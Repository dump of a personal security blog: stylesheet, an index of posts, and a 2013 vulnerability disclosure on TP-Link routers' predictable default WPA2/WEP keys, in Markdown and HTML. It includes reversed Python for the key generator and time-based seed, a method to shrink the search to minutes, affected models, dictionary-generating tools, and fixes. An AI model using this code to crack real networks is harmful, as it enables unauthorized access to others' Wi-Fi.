665 | .markdown-body table tr {
666 |   background-color: #fff;
667 |   border-top: 1px solid #c6cbd1;
668 | }
669 | 
670 | .markdown-body table tr:nth-child(2n) {
671 |   background-color: #f6f8fa;
672 | }
673 | 
674 | .markdown-body img {
675 |   background-color: #fff;
676 |   box-sizing: content-box;
677 |   max-width: 100%;
678 | }
679 | 
680 | .markdown-body img[align=right] {
681 |   padding-left: 20px;
682 | }
683 | 
684 | .markdown-body img[align=left] {
685 |   padding-right: 20px;
686 | }
687 | 
688 | .markdown-body code {
689 |   background-color: rgba(27,31,35,.05);
690 |   border-radius: 3px;
691 |   font-size: 85%;
692 |   margin: 0;
693 |   padding: .2em .4em;
694 | }
695 | 
696 | .markdown-body pre {
697 |   word-wrap: normal;
698 | }
699 | 
700 | .markdown-body pre>code {
701 |   background: transparent;
702 |   border: 0;
703 |   font-size: 100%;
704 |   margin: 0;
705 |   padding: 0;
706 |   white-space: pre;
707 |   word-break: normal;
708 | }
709 | 
710 | .markdown-body .highlight {
711 |   margin-bottom: 16px;
712 | }
713 | 
714 | .markdown-body .highlight pre {
715 |   margin-bottom: 0;
716 |   word-break: normal;
717 | }
718 | 
719 | .markdown-body .highlight pre,
720 | .markdown-body pre {
721 |   background-color: #f6f8fa;
722 |   border-radius: 3px;
723 |   font-size: 85%;
724 |   line-height: 1.45;
725 |   overflow: auto;
726 |   padding: 16px;
727 | }
728 | 
729 | .markdown-body pre code {
730 |   background-color: transparent;
731 |   border: 0;
732 |   display: inline;
733 |   line-height: inherit;
734 |   margin: 0;
735 |   max-width: auto;
736 |   overflow: visible;
737 |   padding: 0;
738 |   word-wrap: normal;
739 | }
740 | 
741 | .markdown-body .commit-tease-sha {
742 |   color: #444d56;
743 |   display: inline-block;
744 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
745 |   font-size: 90%;
746 | }
747 | 
748 | .markdown-body .blob-wrapper {
749 |   border-bottom-left-radius: 3px;
750 |   border-bottom-right-radius: 3px;
751 |   overflow-x: auto;
752 |   overflow-y: hidden;
753 | }
754 | 
755 | .markdown-body .blob-wrapper-embedded {
756 |   max-height: 240px;
757 |   overflow-y: auto;
758 | }
759 | 
760 | .markdown-body .blob-num {
761 |   -moz-user-select: none;
762 |   -ms-user-select: none;
763 |   -webkit-user-select: none;
764 |   color: rgba(27,31,35,.3);
765 |   cursor: pointer;
766 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
767 |   font-size: 12px;
768 |   line-height: 20px;
769 |   min-width: 50px;
770 |   padding-left: 10px;
771 |   padding-right: 10px;
772 |   text-align: right;
773 |   user-select: none;
774 |   vertical-align: top;
775 |   white-space: nowrap;
776 |   width: 1%;
777 | }
778 | 
779 | .markdown-body .blob-num:hover {
780 |   color: rgba(27,31,35,.6);
781 | }
782 | 
783 | .markdown-body .blob-num:before {
784 |   content: attr(data-line-number);
785 | }
786 | 
787 | .markdown-body .blob-code {
788 |   line-height: 20px;
789 |   padding-left: 10px;
790 |   padding-right: 10px;
791 |   position: relative;
792 |   vertical-align: top;
793 | }
794 | 
795 | .markdown-body .blob-code-inner {
796 |   color: #24292e;
797 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
798 |   font-size: 12px;
799 |   overflow: visible;
800 |   white-space: pre;
801 |   word-wrap: normal;
802 | }
803 | 
804 | .markdown-body .pl-token.active,
805 | .markdown-body .pl-token:hover {
806 |   background: #ffea7f;
807 |   cursor: pointer;
808 | }
809 | 
810 | .markdown-body kbd {
811 |   background-color: #fafbfc;
812 |   border: 1px solid #d1d5da;
813 |   border-bottom-color: #c6cbd1;
814 |   border-radius: 3px;
815 |   box-shadow: inset 0 -1px 0 #c6cbd1;
816 |   color: #444d56;
817 |   display: inline-block;
818 |   font: 11px SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
819 |   line-height: 10px;
820 |   padding: 3px 5px;
821 |   vertical-align: middle;
822 | }
823 | 
824 | .markdown-body :checked+.radio-label {
825 |   border-color: #0366d6;
826 |   position: relative;
827 |   z-index: 1;
828 | }
829 | 
830 | .markdown-body .tab-size[data-tab-size="1"] {
831 |   -moz-tab-size: 1;
832 |   tab-size: 1;
833 | }
834 | 
835 | .markdown-body .tab-size[data-tab-size="2"] {
836 |   -moz-tab-size: 2;
837 |   tab-size: 2;
838 | }
839 | 
840 | .markdown-body .tab-size[data-tab-size="3"] {
841 |   -moz-tab-size: 3;
842 |   tab-size: 3;
843 | }
844 | 
845 | .markdown-body .tab-size[data-tab-size="4"] {
846 |   -moz-tab-size: 4;
847 |   tab-size: 4;
848 | }
849 | 
850 | .markdown-body .tab-size[data-tab-size="5"] {
851 |   -moz-tab-size: 5;
852 |   tab-size: 5;
853 | }
854 | 
855 | .markdown-body .tab-size[data-tab-size="6"] {
856 |   -moz-tab-size: 6;
857 |   tab-size: 6;
858 | }
859 | 
860 | .markdown-body .tab-size[data-tab-size="7"] {
861 |   -moz-tab-size: 7;
862 |   tab-size: 7;
863 | }
864 | 
865 | .markdown-body .tab-size[data-tab-size="8"] {
866 |   -moz-tab-size: 8;
867 |   tab-size: 8;
868 | }
869 | 
870 | .markdown-body .tab-size[data-tab-size="9"] {
871 |   -moz-tab-size: 9;
872 |   tab-size: 9;
873 | }
874 | 
875 | .markdown-body .tab-size[data-tab-size="10"] {
876 |   -moz-tab-size: 10;
877 |   tab-size: 10;
878 | }
879 | 
880 | .markdown-body .tab-size[data-tab-size="11"] {
881 |   -moz-tab-size: 11;
882 |   tab-size: 11;
883 | }
884 | 
885 | .markdown-body .tab-size[data-tab-size="12"] {
886 |   -moz-tab-size: 12;
887 |   tab-size: 12;
888 | }
889 | 
890 | .markdown-body .task-list-item {
891 |   list-style-type: none;
892 | }
893 | 
894 | .markdown-body .task-list-item+.task-list-item {
895 |   margin-top: 3px;
896 | }
897 | 
898 | .markdown-body .task-list-item input {
899 |   margin: 0 .2em .25em -1.6em;
900 |   vertical-align: middle;
901 | }
902 | 
903 | .markdown-body hr {
904 |   border-bottom-color: #eee;
905 | }
906 | 
907 | .markdown-body .pl-0 {
908 |   padding-left: 0!important;
909 | }
910 | 
911 | .markdown-body .pl-1 {
912 |   padding-left: 4px!important;
913 | }
914 | 
915 | .markdown-body .pl-2 {
916 |   padding-left: 8px!important;
917 | }
918 | 
919 | .markdown-body .pl-3 {
920 |   padding-left: 16px!important;
921 | }
922 | 
923 | .markdown-body .pl-4 {
924 |   padding-left: 24px!important;
925 | }
926 | 
927 | .markdown-body .pl-5 {
928 |   padding-left: 32px!important;
929 | }
930 | 
931 | .markdown-body .pl-6 {
932 |   padding-left: 40px!important;
933 | }
934 | 
935 | .markdown-body .pl-7 {
936 |   padding-left: 48px!important;
937 | }
938 | 
939 | .markdown-body .pl-8 {
940 |   padding-left: 64px!important;
941 | }
942 | 
943 | .markdown-body .pl-9 {
944 |   padding-left: 80px!important;
945 | }
946 | 
947 | .markdown-body .pl-10 {
948 |   padding-left: 96px!important;
949 | }
950 | 
951 | .markdown-body .pl-11 {
952 |   padding-left: 112px!important;
953 | }
954 | 
955 | .markdown-body .pl-12 {
956 |   padding-left: 128px!important;
957 | }
958 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <!-- This file has been auto-generated! -->
 2 | <!DOCTYPE html>
 3 | <html>
 4 |     <head>
 5 |         <meta charset="utf-8">
 6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |         <title>Blog</title>
 8 |         <!-- Style -->
 9 |         <link rel="stylesheet" href="css/code.css">
10 |         <link rel="stylesheet" href="css/markdown.css">
11 |         <style>
12 |             body {
13 |                 box-sizing: border-box;
14 |                 min-width: 200px;
15 |                 max-width: 980px;
16 |                 margin: 0 auto;
17 |                 padding: 45px;
18 |             }
19 | 
20 |             header {
21 |                 position: relative;
22 |             }
23 |             header > .links {
24 |                 position: absolute;
25 |                 right: 0;
26 |             }
27 | 
28 |             footer {
29 |                 text-align: center;
30 |             }
31 |         
32 |             @media (max-width: 767px) {
33 |                 body {
34 |                     padding: 15px;
35 |                 }
36 |             }
37 |         </style>
38 |     </head>
39 |     <body class="markdown-body">
40 |         <header>
41 |             <div class="links">
42 |                 <span>
43 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
44 |                     <a href="https://github.com/AlexAltea">Github</a> |
45 |                     <a href="mailto:alexandro@phi.nz">Email</a>
46 |                 </span>
47 |             </div>
48 |             <h1>Blog</h1>
49 |         </header>
50 |         <article>
51 |             <table><thead><td><b>Date</b></td><td><b>Article</b></td></thead><tr><td>2019-02-16</td><td><a href="posts/2019-02-16-cell-miner-alu/">PS3/Cell Cryptomining: Wide arithmetic on SPUs</a></td></tr><tr><td>2018-04-18</td><td><a href="posts/2018-04-18-lle-vs-hle/">LLE vs HLE and their tradeoffs</a></td></tr><tr><td>2017-06-19</td><td><a href="posts/2017-07-19-googlectf-2017-moon/">GoogleCTF 2017 Reversing/Moon writeup</a></td></tr><tr><td>2016-10-12</td><td><a href="posts/2016-10-12-xchg-rax-rax-solutions/">Solutions of xchg rax,rax</a></td></tr><tr><td>2016-09-07</td><td><a href="posts/2016-09-14-jit-compiled-maps/">Fast lookups in JIT-compiled maps</a></td></tr><tr><td>2016-08-22</td><td><a href="posts/2016-08-22-observations/">Observations</a></td></tr><tr><td>2016-03-16</td><td><a href="posts/2016-03-16-ps3-gpu-exploit/">PS3 GPU Full VRAM/IO access exploit</a></td></tr><tr><td>2013-04-20</td><td><a href="posts/2013-04-20-virtualdj-74-buffer-overflow/">VirtualDJ Pro/Home 7.4: Buffer Overflow</a></td></tr><tr><td>2013-03-31</td><td><a href="posts/2013-03-31-wpa2-vulnerability-linksys-dlink/">WPA2 Key Generation Vulnerability: Linksys / D-Link</a></td></tr><tr><td>2013-03-30</td><td><a href="posts/2013-03-30-virtualdj-73-buffer-overflow/">VirtualDJ Pro/Home 7.3: Buffer Overflow</a></td></tr><tr><td>2013-03-08</td><td><a href="posts/2013-03-08-wpa2-vulnerability-tplink/">WPA2 Key Generation Vulnerability: TP-Link</a></td></tr></table>
52 |         </article>
53 |         <hr>
54 |         <footer>
55 |             <p>
56 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
57 |             </p>
58 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
59 |         </footer>
60 |     </body>
61 | </html>
62 | 


--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2013-03-08
  4 | title: WPA2 Key Generation Vulnerability: TP-Link
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | These days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key `TP-LINK_XXXXXX`. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&amp;version=V1#tbl_b).
  9 | 
 10 | Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator) reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:
 11 | 
 12 | ```python
 13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
 14 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 
 15 |     key = ""
 16 |     for i in range(length):
 17 |         seed = (seed * 0x343FD) + 0x269EC3
 18 |         key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
 19 |     return key
 20 | ```
 21 | 
 22 | Furthermore, note how for any `length` and 32-bit integer seed `k` the following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 2^31 / 20000 seconds = 1.24 days.
 23 | 
 24 | There is an additional issue affecting the seed generation that can help reduce the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is:
 25 | 
 26 | ```python
 27 | import datetime
 28 |  
 29 | def genSeed(currentTime):
 30 |     dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
 31 |     t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
 32 |  
 33 |     tA = (t / 2**32 + 0xFE624E21)
 34 |     tB = (t % 2**32 + 0x2AC18000) % (1 << 32)
 35 |  
 36 |     if tA >= (1 << 32):
 37 |         tA += 1
 38 |         tA %= (1 << 32)
 39 |  
 40 |     r = (tA % 0x989680) * (2**32)
 41 |     r = ((r + tB) / 0x989680) % (2**32)
 42 |     return r
 43 |  
 44 | print genSeed(datetime.datetime.utcnow())
 45 | ```
 46 | 
 47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA3AD` and `0x50E22700`:
 48 | 
 49 | ```python
 50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0))  # 0x4EFFA3AD
 51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0))  # 0x50E22700
 52 | ```
 53 | 
 54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.
 55 | 
 56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:
 57 | 
 58 | * Detect the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.
 59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely that someone sets up their router between 2 AM and 6 AM.
 60 | 
 61 | ## Affected routers
 62 | 
 63 | I have verified all setup assistants distributed with TP-Link routers and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. In about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident enough that the results from other routers of the same series can be extrapolated to them.
 64 | 
 65 | The complete list of affected routers is:
 66 | 
 67 | * TL-W8151N (V1, V3)
 68 | * TL-WA730RE (V1, V2*)
 69 | * TL-WA830RE (V1, V2*)
 70 | * TL-WDR3500
 71 | * TL-WDR3600
 72 | * TL-WDR4300
 73 | * TL-WR720N
 74 | * TL-WR740N (V1, V2, V3, V4)
 75 | * TL-WR741ND (V1, V2, V3*, V4)
 76 | * TL-WR841N (V1*, V5, V7, V8)
 77 | * TL-WR841ND (V3, V5, V7, V8*)
 78 | * TL-WR842ND
 79 | * TL-WR940N (V1, V2)
 80 | * TL-WR941ND (V2, V3, V4, V5)
 81 | * TL-WR1043N
 82 | * TL-WR1043ND
 83 | * TD-VG3511 (V1*)
 84 | * TD-VG3631
 85 | * TD-W8901N
 86 | * TD-W8950ND
 87 | * TD-W8951NB (V3*, V4, V5)
 88 | * TD-W8951ND (V1, V3, V4, V5)
 89 | * TD-W8960N (V1, V3, V4)
 90 | * TD-W8961NB (V1, V2, V3*)
 91 | * TD-W8961ND
 92 | * TD-W8968
 93 | * TD-W8970
 94 | 
 95 | ## Resources
 96 | 
 97 | * __TPLink-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.
 98 | 
 99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.
100 | 
101 | * __TPLink-GenKeys__: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.
102 | 
103 | ## Solutions
104 | 
105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/random` or `/dev/urandom` in Unix-like systems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
106 | * If for some reason you want to use seeds for generating keys:
107 |     * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
108 |     * Obtain them from a cryptographically secure PRNG.
109 |     * If you still want to obtain them from the system time, use fine-grained time units (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
110 | 


--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>WPA2 Key Generation Vulnerability: TP-Link</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>WPA2 Key Generation Vulnerability: TP-Link</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-08</span>
 72 |             </p>
 73 |             <p>These days I have been playing with my new WLAN router, a <a href="http://www.tp-link.com/en/products/?categoryid=203">TP-Link TD-W8970</a>, and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key <code>TP-LINK_XXXXXX</code>. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range <code>[0-9A-Z]</code> and randomly generated by the <a href="http://www.tp-link.com/mx/support/download/?model=TD-W8970&amp;version=V1#tbl_b">EasySetupAssistant</a>.</p>
 74 | <p>Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a <a href="http://en.wikipedia.org/wiki/Linear_congruential_generator">linear congruential generator</a> reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:</p>
 75 | <div class="codehilite"><pre><span></span><span class="n">chars</span> <span class="o">=</span> <span class="s2">&quot;2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ&quot;</span>
 76 | <span class="k">def</span> <span class="nf">gen</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span> <span class="c1">#length=10 in WPA/WPA2, length=13 in WEP </span>
 77 |     <span class="n">key</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
 78 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">length</span><span class="p">):</span>
 79 |         <span class="n">seed</span> <span class="o">=</span> <span class="p">(</span><span class="n">seed</span> <span class="o">*</span> <span class="mh">0x343FD</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x269EC3</span>
 80 |         <span class="n">key</span> <span class="o">+=</span> <span class="n">chars</span><span class="p">[((</span><span class="n">seed</span> <span class="o">&gt;&gt;</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7FFF</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0x28</span><span class="p">]</span>
 81 |     <span class="k">return</span> <span class="n">key</span>
 82 | </pre></div>
 83 | 
 84 | 
 85 | <p>Furthermore, note how for any <code>length</code> and 32-bit integer seed <code>k</code> the following condition holds: <code>gen(k, length) == gen(k + 0x80000000, length)</code>. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 2^31 / 20000 seconds = 1.24 days.</p>
 86 | <p>There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure <a href="https://en.wikipedia.org/wiki/Pseudorandom_number_generator">PRNG</a>. Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via <code>GetSystemTimeAsFileTime</code> from <code>Kernel32.dll</code>. The corresponding code to generate a seed at a given moment is:</p>
 87 | <div class="codehilite"><pre><span></span><span class="kn">import</span> <span class="nn">datetime</span>
 88 | 
 89 | <span class="k">def</span> <span class="nf">genSeed</span><span class="p">(</span><span class="n">currentTime</span><span class="p">):</span>
 90 |     <span class="n">dt</span> <span class="o">=</span> <span class="n">currentTime</span> <span class="o">-</span> <span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">1601</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
 91 |     <span class="n">t</span> <span class="o">=</span> <span class="n">dt</span><span class="o">.</span><span class="n">days</span><span class="o">*</span><span class="mi">864000000000</span> <span class="o">+</span> <span class="n">dt</span><span class="o">.</span><span class="n">seconds</span><span class="o">*</span><span class="mi">10000000</span> <span class="o">+</span> <span class="n">dt</span><span class="o">.</span><span class="n">microseconds</span><span class="o">*</span><span class="mi">10</span>
 92 | 
 93 |     <span class="n">tA</span> <span class="o">=</span> <span class="p">(</span><span class="n">t</span> <span class="o">/</span> <span class="mi">2</span><span class="o">**</span><span class="mi">32</span> <span class="o">+</span> <span class="mh">0xFE624E21</span><span class="p">)</span>
 94 |     <span class="n">tB</span> <span class="o">=</span> <span class="p">(</span><span class="n">t</span> <span class="o">%</span> <span class="mi">2</span><span class="o">**</span><span class="mi">32</span> <span class="o">+</span> <span class="mh">0x2AC18000</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span>
 95 | 
 96 |     <span class="k">if</span> <span class="n">tA</span> <span class="o">&gt;=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">):</span>
 97 |         <span class="n">tA</span> <span class="o">+=</span> <span class="mi">1</span>
 98 |         <span class="n">tA</span> <span class="o">%=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span>
 99 | 
100 |     <span class="n">r</span> <span class="o">=</span> <span class="p">(</span><span class="n">tA</span> <span class="o">%</span> <span class="mh">0x989680</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
101 |     <span class="n">r</span> <span class="o">=</span> <span class="p">((</span><span class="n">r</span> <span class="o">+</span> <span class="n">tB</span><span class="p">)</span> <span class="o">/</span> <span class="mh">0x989680</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
102 |     <span class="k">return</span> <span class="n">r</span>
103 | 
104 | <span class="k">print</span> <span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="o">.</span><span class="n">utcnow</span><span class="p">())</span>
105 | </pre></div>
106 | 
107 | 
108 | <p>If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between <code>0x4EFFA3AD</code> and <code>0x50E22700</code>:</p>
109 | <div class="codehilite"><pre><span></span><span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">2012</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span>  <span class="c1"># 0x4EFFA3AD</span>
110 | <span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">2013</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span>  <span class="c1"># 0x50E22700</span>
111 | </pre></div>
112 | 
113 | 
114 | <p>At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.</p>
115 | <p>Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:</p>
116 | <ul>
117 | <li>Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.</li>
118 | <li>Discard any seeds corresponding to <em>strange</em> hours. For instance, it is pretty unlikely that someone sets up their router between 2 AM and 6 AM.</li>
119 | </ul>
120 | <h2 id="affected-routers">Affected routers</h2>
121 | <p>I have verified all setup assistants distributed with TP-Link routers and all <em>TL-WA</em>, <em>TL-WR</em>, <em>TL-WDR</em> series and <em>TD-WXXXX</em>, <em>TD-VGXXXX</em> models are affected. In about 10% of these routers I wasn't able to download the <em>EasySetupAssistant</em> through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.</p>
122 | <p>The complete list of affected routers is:</p>
123 | <ul>
124 | <li>TL-W8151N (V1, V3)</li>
125 | <li>TL-WA730RE (V1, V2*)</li>
126 | <li>TL-WA830RE (V1, V2*)</li>
127 | <li>TL-WDR3500</li>
128 | <li>TL-WDR3600</li>
129 | <li>TL-WDR4300</li>
130 | <li>TL-WR720N</li>
131 | <li>TL-WR740N (V1, V2, V3, V4)</li>
132 | <li>TL-WR741ND (V1, V2, V3*, V4)</li>
133 | <li>TL-WR841N (V1*, V5, V7, V8)</li>
134 | <li>TL-WR841ND (V3, V5, V7, V8*)</li>
135 | <li>TL-WR842ND</li>
136 | <li>TL-WR940N (V1, V2)</li>
137 | <li>TL-WR941ND (V2, V3, V4, V5)</li>
138 | <li>TL-WR1043N</li>
139 | <li>TL-WR1043ND</li>
140 | <li>TD-VG3511 (V1*)</li>
141 | <li>TD-VG3631</li>
142 | <li>TD-W8901N</li>
143 | <li>TD-W8950ND</li>
144 | <li>TD-W8951NB (V3*, V4, V5)</li>
145 | <li>TD-W8951ND (V1, V3, V4, V5)</li>
146 | <li>TD-W8960N (V1, V3, V4)</li>
147 | <li>TD-W8961NB (V1, V2, V3*)</li>
148 | <li>TD-W8961ND</li>
149 | <li>TD-W8968</li>
150 | <li>TD-W8970</li>
151 | </ul>
152 | <h2 id="resources">Resources</h2>
153 | <ul>
154 | <li>
155 | <p><strong>TPLink-CheckKeys</strong>: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.</p>
156 | </li>
157 | <li>
158 | <p><strong>TPLink-GenSeeds</strong>: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.</p>
159 | </li>
160 | <li>
161 | <p><strong>TPLink-GenKeys</strong>: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in <code>./output.txt</code>. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.</p>
162 | </li>
163 | </ul>
164 | <h2 id="solutions">Solutions</h2>
165 | <ul>
166 | <li>Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as <code>/dev/random</code> or <code>/dev/urandom</code> in Unix-like systems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by <code>CryptGenRandom</code> in <code>Advapi32.dll</code>.</li>
167 | <li>If for some reason you want to use seeds for generating keys:</li>
